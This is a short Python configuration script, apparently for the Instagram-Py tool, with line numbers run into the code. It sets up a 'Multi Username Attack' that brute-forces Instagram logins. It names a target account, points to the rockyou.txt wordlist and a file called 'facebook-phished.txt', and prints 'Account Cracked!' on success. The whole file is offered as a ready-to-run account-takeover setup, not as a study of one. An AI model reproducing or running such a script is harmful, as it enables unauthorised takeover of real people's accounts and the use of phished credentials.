#!/usr/bin/instagram-py -s1# Only Supports Python 323import os45def hacked_an_account(username , password):6# Use Twilio API to Make a Message to our phone MayBe?7print("Account Cracked!")8return True91011print("Initiating Multi Username Attack Script...")1213global_callback = hacked_an_account14global_password_list = "{}/Developer/.exploits/facebook-phished.txt".format(os.path.expanduser('~'))1516usernames = [ # Reserved Variable17{18"id" : "instatestgod__",19"password_list" : "/home/antonyjr/Developer/.exploits/rockyou.txt" , # full path20"countinue" : True, # Optional21"verbose" : 0 # Optional22},23# If you want to simultaniously attack the same account with different wordlist24# Apparently Saving does not work here if two wordlist are used on a single user!25# could be later fixed anyways...26{27"id" : "instatestgod__",28# global password list will cover us if password list is not mentioned!29"countinue" : False, # Optional30"verbose" : 3 # Optional31}32# ,33# {34# "id" : "even_more_users",35# "password_list" : "different_passwords.lst",36# }37]38# Attack Automatically starts here!394041